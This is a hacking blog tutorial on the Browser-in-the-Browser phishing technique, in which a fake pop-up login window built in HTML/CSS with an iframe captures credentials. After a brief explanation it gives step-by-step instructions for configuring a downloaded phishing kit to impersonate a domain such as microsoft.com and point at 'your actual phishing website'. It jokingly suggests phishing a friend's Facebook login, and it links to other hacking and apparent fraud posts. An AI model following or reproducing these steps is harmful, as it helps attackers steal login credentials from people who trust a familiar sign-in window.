A PHISHING TECHNIQUE FORBIDDEN FROM OUR WORLD

INTRODUCTION

Hi everyone, I hope you all are doing good. In this Browser in the Browser Attack Tutorial, We are going to talk about a latest phishing technique i.e Browser in the Browser attack. Before we jump into the article, can you identify the difference between the image:

browser in the browser attack tutorial
Phishing website vs Real website from here

If you don’t know about phishing then in simple terms, it is an online attack that can be used to steal sensitive information like credentials, credit card details etc. Let’s take a short example: Suppose you have copied the sources code of Facebook’s website and host it on your server. Now you have given your malicious website’s link to your friend saying “Hey bro, I just got $100 by using this website, you just need to login to this website through Facebook account and you are done!“. Assuming that your friend has so much faith in you, he/she logs in to your website. BOOM! Now you got their Facebook credentials!!!

A/Q Cisco, “Phishing attacks are the practice of sending fraudulent communications that appear to come from a reputable source. It is usually done through email. The goal is to steal sensitive data like credit card and login information, or to install malware on the victim’s machine. Phishing is a common type of cyber attack that everyone should learn about in order to protect themselves.

WHAT IS BROWSER IN THE BROWSER ATTACK?

Before we begin, Have you ever encountered with the webpage below?

Source: https://mrd0x.com/

I think most of us are already familiar with this type of webpage. We normally click on “Sign in with Google” or “Sign in with Facebook” and then a window pops up. After that we fill our credentials and everything seems to look fine right? This is where most people will become vulnerable to phishing attack. In Browser in the Browser attack, when we click on something like “Sign in with Google”, it will seem like the browser has opened a window. However, the malicious webpage will not open a window. It will pretend as if it has opened a window but in reality that window is also controlled by the webpage. Which means, when you provide your credentials to the webpage then it will easily get captured by the attacker.

Here’s what mrd0x(The founder) has to say, “Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and its basically indistinguishable.

BROWSER IN THE BROWSER ATTACK TUTORIAL

Now we will learn how to perform this attack. Follow these steps:

1- Download the file from here.

2- Open the “Windows-Chrome-DarkMode” folder.

3- Open index.html file with notepad.

4- Modify the following in index.html:

XX-TITLE-XX -> YOUR TITLE

XX-DOMAIN-NAME-XX -> DOMAIN NAME(Like microsoft.com).

XX-DOMAIN-PATH-XX -> The directory (Like auth/signin).

XX-PHISHING-LINK-XX -> Your actual phishing website.(like yourphishingwebsite.com/)

5- Save the file and open index.html. You should see something like this:

Output

CONCLUSION

I hope you understand about Browser in the Browser attack with this tutorial. You can read more about this here.

Update: Download the BITB File here. To use this tool, click on this video.

For more hacking articles, check out our other posts:

WHAT CROSS SITE SCRIPTING IS?

HTML INJECTION ATTACKS

PURCHASE ANYTHING AT RS 1